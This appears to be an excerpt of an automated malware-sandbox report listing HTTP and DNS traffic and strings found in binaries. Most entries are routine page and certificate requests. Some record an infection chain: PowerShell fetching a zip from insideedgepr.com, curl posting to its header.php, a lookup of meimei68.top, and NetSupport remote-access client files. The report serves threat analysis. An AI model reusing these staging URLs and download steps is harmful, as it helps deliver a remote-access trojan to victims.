Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/fybg.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/wp-content/themes/cn/en_css/public.css?v=1accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: i
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2022/10/cropped-favicon-32x32.jpg HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/wlicn0.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/20230911094506.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/wlicn2.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/wlicn3.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/weixincodeimage.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/logo1.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/Heptagon-Logo.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/09/02%E5%8D%8A%E5%AF%BC%E4%BD%93%E6%BF%80%E5%85%89%E5%85%83%E5%99%A8%E4%BB%B6.jpg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/xingxingmap.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/jgdtline.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/fybg.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2022/10/cropped-favicon-32x32.jpg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/logo1.svg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/05/%E6%B1%BD%E8%BD%A6%E5%BA%94%E7%94%A8.jpg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2022/09/%E7%A7%91%E5%AD%A6%E7%A0%94%E7%A9%B6.jpg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/08/01%E5%8E%9F%E6%9D%90%E6%96%99.jpg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/08/03%E6%BF%80%E5%85%89%E5%85%89%E5%AD%A6%E5%85%83%E5%99%A8%E4%BB%B6.jpg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/05/%E6%B6%88%E8%B4%B9%E7%94%B5%E5%AD%90.jpg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/dtimg.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2022/09/Optical-coating-3.jpg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/05/%E5%85%88%E8%BF%9B%E5%88%B6%E9%80%A0.jpg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/05/%E5%8C%BB%E7%96%97%E5%81%A5%E5%BA%B7.jpg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/07/04%E8%A7%A3%E5%86%B3%E6%96%B9%E6%A1%88.jpg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/footbg.jpg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/05/%E5%85%89%E9%80%9A%E4%BF%A1.jpg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/jjbg.jpg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: u=1, i
Source: global traffic HTTP traffic detected: GET /raxs.zip?8d21e5f647d81a33c781 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.insideedgepr.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=3AbPdawTdpo235d&MD=4WrkVZ6r HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: www.focuslight.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: www.focuslight.com
Source: global traffic DNS traffic detected: DNS query: ace-project.org
Source: global traffic DNS traffic detected: DNS query: meimei68.top
Source: global traffic DNS traffic detected: DNS query: focuslight-www.oss-ap-southeast-1.aliyuncs.com
Source: global traffic DNS traffic detected: DNS query: sc.lfeeder.com
Source: global traffic DNS traffic detected: DNS query: tr.lfeeder.com
Source: global traffic DNS traffic detected: DNS query: www.insideedgepr.com
Source: unknown HTTP traffic detected: POST /header.php HTTP/1.1Host: www.insideedgepr.comUser-Agent: curl/7.83.1Accept: */*
Source: client32.exe, 0000001D.00000002.2022624501.000000006C090000.00000002.00000001.01000000.00000010.sdmp, HTCTL32.DLL.28.dr String found in binary or memory: http://%s/fakeurl.htm
Source: client32.exe, 0000001D.00000002.2022624501.000000006C090000.00000002.00000001.01000000.00000010.sdmp, HTCTL32.DLL.28.dr String found in binary or memory: http://%s/testpage.htm
Source: client32.exe, 0000001D.00000002.2022624501.000000006C090000.00000002.00000001.01000000.00000010.sdmp, HTCTL32.DLL.28.dr String found in binary or memory: http://%s/testpage.htmwininet.dll
Source: client32.exe, 0000001D.00000002.2021848504.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000021.00000002.1891623943.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000022.00000002.1973644487.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, PCICL32.DLL.28.dr String found in binary or memory: http://127.0.0.1
Source: client32.exe, 0000001D.00000002.2021848504.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000021.00000002.1891623943.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000022.00000002.1973644487.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, PCICL32.DLL.28.dr String found in binary or memory: http://127.0.0.1RESUMEPRINTING
Source: hw.dll.28.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: hw.dll.28.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: hw.dll.28.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: hw.dll.28.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: hw.dll.28.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: hw.dll.28.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: hw.dll.28.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: client32.exe, 0000001D.00000002.2021848504.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000021.00000002.1891623943.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000022.00000002.1973644487.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, PCICL32.DLL.28.dr String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
Source: client32.exe, 0000001D.00000002.2021848504.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000021.00000002.1891623943.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000022.00000002.1973644487.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, PCICL32.DLL.28.dr String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
Source: hw.dll.28.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: hw.dll.28.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: hw.dll.28.dr String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 0000001C.00000002.1759185059.000000000520A000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.28.dr, HTCTL32.DLL.28.dr, PCICL32.DLL.28.dr String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: powershell.exe, 0000001C.00000002.1759185059.000000000520A000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.28.dr, HTCTL32.DLL.28.dr, PCICL32.DLL.28.dr String found in binary or memory: http://s2.symcb.com0
Source: powershell.exe, 0000001C.00000002.1759185059.0000000004C01000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: hw.dll.28.dr String found in binary or memory: http://support.steampowered.com
Source: powershell.exe, 0000001C.00000002.1759185059.000000000520A000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.28.dr, HTCTL32.DLL.28.dr, PCICL32.DLL.28.dr String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: powershell.exe, 0000001C.00000002.1759185059.000000000520A000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.28.dr, HTCTL32.DLL.28.dr, PCICL32.DLL.28.dr String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: powershell.exe, 0000001C.00000002.1759185059.000000000520A000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.28.dr, HTCTL32.DLL.28.dr, PCICL32.DLL.28.dr String found in binary or memory: http://sv.symcd.com0&
Source: hw.dll.28.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: hw.dll.28.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: hw.dll.28.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: hw.dll.28.dr String found in binary or memory: http://www.counter-strike.net/cheat.html
Source: client32.exe, 0000001D.00000002.2021916267.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, client32.exe, 00000021.00000002.1891661737.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, client32.exe, 00000022.00000002.1973680770.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, PCICL32.DLL.28.dr String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
Source: client32.exe, 0000001D.00000002.2021916267.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, client32.exe, 00000021.00000002.1891661737.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, client32.exe, 00000022.00000002.1973680770.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, PCICL32.DLL.28.dr String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
Source: client32.exe, 0000001D.00000002.2021916267.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, client32.exe, 00000021.00000002.1891661737.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, client32.exe, 00000022.00000002.1973680770.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, PCICL32.DLL.28.dr String found in binary or memory: http://www.pci.co.uk/support
Source: client32.exe, 0000001D.00000002.2021916267.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, client32.exe, 00000021.00000002.1891661737.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, client32.exe, 00000022.00000002.1973680770.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, PCICL32.DLL.28.dr String found in binary or memory: http://www.pci.co.uk/supportsupport
Source: powershell.exe, 0000001C.00000002.1759185059.000000000520A000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.28.dr, HTCTL32.DLL.28.dr, PCICL32.DLL.28.dr String found in binary or memory: http://www.symauth.com/cps0(
Source: powershell.exe, 0000001C.00000002.1759185059.000000000520A000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.28.dr, HTCTL32.DLL.28.dr, PCICL32.DLL.28.dr String found in binary or memory: http://www.symauth.com/rpa00
Source: powershell.exe, 0000001C.00000002.1759185059.0000000004C01000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000001C.00000002.1759185059.000000000520A000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.28.dr, HTCTL32.DLL.28.dr, PCICL32.DLL.28.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: powershell.exe, 0000001C.00000002.1759185059.000000000520A000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.28.dr, HTCTL32.DLL.28.dr, PCICL32.DLL.28.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: hw.dll.28.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: curl.exe, 00000018.00000002.1578523961.0000000002A70000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000018.00000003.1577847612.0000000002985000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000018.00000002.1578218088.0000000002958000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000018.00000003.1577752347.0000000002985000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.insideedgepr.com/header.php
Source: curl.exe, 00000018.00000002.1578218088.0000000002950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.insideedgepr.com/header.php-oC:
